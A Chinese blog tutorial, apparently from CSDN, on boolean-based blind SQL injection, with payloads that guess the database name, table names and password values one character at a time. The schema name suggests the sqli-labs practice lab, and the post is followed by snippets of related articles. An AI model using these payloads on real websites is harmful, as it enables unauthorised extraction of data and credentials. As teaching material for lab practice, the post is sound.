sql注入———boolean注入(布尔盲注)

最新推荐文章于 2024-04-03 23:52:54 发布
最新推荐文章于 2024-04-03 23:52:54 发布
阅读量947 收藏 1
点赞数
分类专栏: sql 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hintll/article/details/120187152
版权

sql注入———boolean注入(布尔盲注)

这里讲关于sql注入中出现一些过滤的情况之基于布尔注入
如果注入网站的源码中有preg_math函数来过滤了一些注入的命令
列如:
if(preg_math(“union|sleep|benchmark/i”,$id)){
exit(“no”);
}
这里就过滤掉了union等注入命令

如果页面只返回True和False或yes和no两种类型页面
这种情况下就要使用布尔注入的方法来进行sql注入
直接先爆破数据库的名称:
?id=1’ and substr(database(),1,1)=‘a’ --+
然后抓包发送到爆破模块
然后将‘a’之后的字母逐个爆破

再爆破表名:
?id=1’ and substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1)=‘a’–+
然后将字母’a’的位置进行爆破所有字母

用下面的这个命令可以进行爆破多个表:
?id=1’ and substr((select group_concat(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1),1,1)=‘a’–+

爆破字段内容:
?id=1’ and substr((select password from users limit 0,1),1,1)=‘a’–+

hint=flag
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sql漏洞注入盲注
Matheus的博客
07-22 517
盲注Boolean盲注、时间盲注布尔Boolean盲注 1 布尔注入 有些情况下,开发人员屏蔽了报错信息,导致攻击者无法通过报错信息进行注入的判断。这种情况下的注入,称为盲注盲注根据展现方式,分为boolean盲注和时间型盲注Boolean是基于真假的判断(true or false); 不管输入什么,结果都只返回真或假两种情况; 通过and 1=1和and 1=2可以发现注入点。 Boolean盲注的关键在于通过表达式结果与已知值进行比对,根据比对结果 判断正确与否。 2 布尔盲注
SQL注入进阶:掌握布尔盲注和延时注入攻击技巧
weixin_43263566的博客
01-21 3957
SQL注入篇 - 布尔盲注及延时注入
sql boolean类型
weixin_34324081的博客
08-18 1662
关于 MySQLboolean 和 tinyint(1) boolean类型MYSQL保存BOOLEAN值时用1代表TRUE,0代表FALSE,boolean在MySQL里的类型为tinyint(1),MySQL里有四个常量:true,false,TRUE,FALSE,它们分别代表1,0,1,0,mysql> select true,false,TRUE,FALSE;+-...
sql注入布尔盲注
最新发布
2401_82760239的博客
04-03 971
为啥要用ASCII码呢,select substr(database(),1,1)='q' and sleep(3)这种直接写='a'的形式不是也可以吗,但是在时间盲注猜解时,如果一个一个试非常的麻烦而且工作量巨大,这个时候就应该写一个脚本,自动的来猜测,脚本如果直接用字母符号计算的时候会比较慢,所以使用ASCII码会提高效率。很多函数都有变种,用法与效果类似,名字不同,在某些时候,一些函数被禁止调用,可以寻找其变种来使用,如:substr与mid,left()从左往右截,ascii与ord。
SQL注入漏洞
weixin_52878095的博客
08-01 254
SQL注入基本原理 原理: SQL注入指是服务器未严格校验客户端发送的数据,而导致服务端SQL语句被恶意修改并成功执行的行为。 原因: 代码对带入SQL语句的参数过滤不严格 未启用框架的安全配置 未使用框架安全的查询方法 测试接口未删除 未启用防火墙 未使用其他的安全防护设备 危害: 可能导致数据泄露或数据破坏,缺乏可审计性,甚至导致完全接管主机。 SQL注入基本知识 MySQL默认的数据库有sys、mysql、performance_schema、information_schema; informa
GaussDB SQL基础语法示例-BOOLEAN表达式
Gauss松鼠会
10-27 3676
BOOLEAN表达式在SQL中非常常用,它们允许开发人员构建逻辑语句,这些语句能够对表中的数据进行复杂的过滤和选择。通过使用布尔表达式,查询结果可以缩小到满足特定条件的行,或者可以根据这些条件对数据进行聚合和分组。 总之,布尔表达式可以帮助我们进行逻辑判断和循环控制,提高代码的可读性。 熟练掌握BOOLEAN表达式的使用,在GaussDB SQL等开发过程中非常重要。
SQL注入——基于Boolean盲注
yuan114012的博客
05-20 832
一.基于Boolean盲注 使用场景:没有数据回显,条件正确有结果错误没有结果 利用方式:构造判断条件逐个猜测、 1.所需语法与函数 database() #获取当前数据库的名字 length(str) #计算 str 的长度 substr(str,起始位,截取位数) group_concat(列名) #把某列的全部值输出到一行,默认用逗号分隔 二、举例说明 基于Boolean盲注,以...
SQL注入布尔注入
南城无笙的Blog
04-11 1178
废话不多说,下面让我们开始介绍SQL注入布尔注入,这里,作者使用的例子是sqli。 来到对应的靶场,可以看到如下的画面: 第二步 然后,我们在其后面添加:?id=1返回如下画面:(这里虽然不是布尔值,但是其返回结果课讲You are in 看作yes,无返回看作no) 第三步 这时,我们在其后面加上英文的单引号,再查看其返回结果 从下图可以看出,返回的是no(将这种返回值看作no) 第四步...
前端学习11 js基础02 复选框、数据类型
weixin_44189110的博客
11-03 303
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document</title> <style> .on{ b
sql注入实战—Boolean注入
qq_40909772的博客
07-15 1218
测试网站:自建靶场 http://192.168.57.128:1237/sql/boolean.php?id=1 测试工具:Burp Suite 1.访问目标测试地址,使用burp进行抓包。返回的测试结果如下所示: 2.使用id=1’ and 1=1%23,id=1’ and 1=2%23,发现返回的结果分别是yes和no,如下所示:   由以上输出的结果可知,不能使用union注入,此处可以使用Boolean注入Boolean注入是指在构造SQL判断语句1,通过查看页面的返回结果来推测哪些SQL判断
东哥视频学习笔记——SQL手工注入布尔注入
gam0n的博客
08-28 383
1.mid(str,1,3)字符串截取,从第一个字符截取,取三个字符,即从第一个字符到第三个字符 2.ORD()转换为ascii码 3.length()统计字节长度 4.version()查看数据库版本 5.database()查看数据库名 6.user()查看用户名 一、获取数据库名长度: 通过单引号闭合前面sql查询语句, username=111' or length(...
Sql注入平台.zip
02-21
一个在本地搭建的SQL注入的平台,能够进行SQL注入,适用于GET和POST场景 包含了基于union查询的注入、基于报错的注入、基于floor的报错注入、基于boolean盲注、基于时间的盲注……
SQL注入漏洞过程实例及解决方案
12-14
boolean flag=login("aaa' OR ' ","1651561"); //若已知用户名,用这种方式便可不用知道密码就可登陆成功 if (flag){ System.out.println("登陆成功"); }else{ System.out.println("登陆失败"); } } public ...
java sql注入l
10-01
-- 防止SQL注入的过滤器 --> 72 <filter> 73 <filter-name>antiSqlInjection</filter-name> 74 <filter-class>com.tarena.dingdang.filter.AntiSqlInjectionfilter</filter-class> 75 </filter> 76 ...
JavaScript类型系统之布尔Boolean类型详解
10-22
主要介绍了JavaScript类型系统之布尔Boolean类型详解的相关资料,非常不错,具有参考借鉴价值,需要的朋友可以参考下
Unity 几何体布尔运算BooleanRT
09-29
Unity 几何体布尔运算BooleanRT,Boolean RT.unitypackage,unity3d布尔运算插件。
SQL注入布尔式(boolean注入
2301_79299101的博客
09-22 306
输入1' and if(substring(database(),1,1)='d',1,0)--+输入1'and if(length(database())=4,1,0) #其他的表名和列都用同样的方法 ,其他信息也是一样。输入 vince'and'1'='1。再输入 vince'and'1'='2。2,判断是数字式还是字符型。3,判断数据库有多少个字段。
PL/SQL 数据类型和变量 -- BOOLEAN
千里之行始于足下
01-01 1761
-- Start PL/SQL 还支持布尔(BOOLEAN)数据类型。 DECLARE ISTEST BOOLEAN; BEGIN IF (ISTEST IS NULL) THEN DBMS_OUTPUT.PUT_LINE('UNKNOW'); END IF; ISTEST := TRUE; IF (ISTEST) THEN DBMS_OUTPUT.P
SQL注入盲注Boolean类型)
破博客
09-21 1722
sql盲注适用于页面不直接返回数据,而是返回是或否,或者更简单的,正常显示或非正常显示,这时就需要来使用sql语句形成判断性返回值,例如正常返回或报错。 以sqli-labs Less5举例 访问http://localhost/sqli-labs/Less-5/?id=1后页面只显示了You are in……而没有像之前那样显示用户名等信息,尝试在URL后加单引号显示错误,有字符串注入的空间,将...
布尔盲注python
10-08
布尔盲注Boolean-based Blind SQL Injection)是一种通过构造布尔表达式来判断某些条件是否成立,从而得出目标网站的数据库信息的攻击方式。在 Python 中可以使用 requests 库向目标网站发送 HTTP 请求,并通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值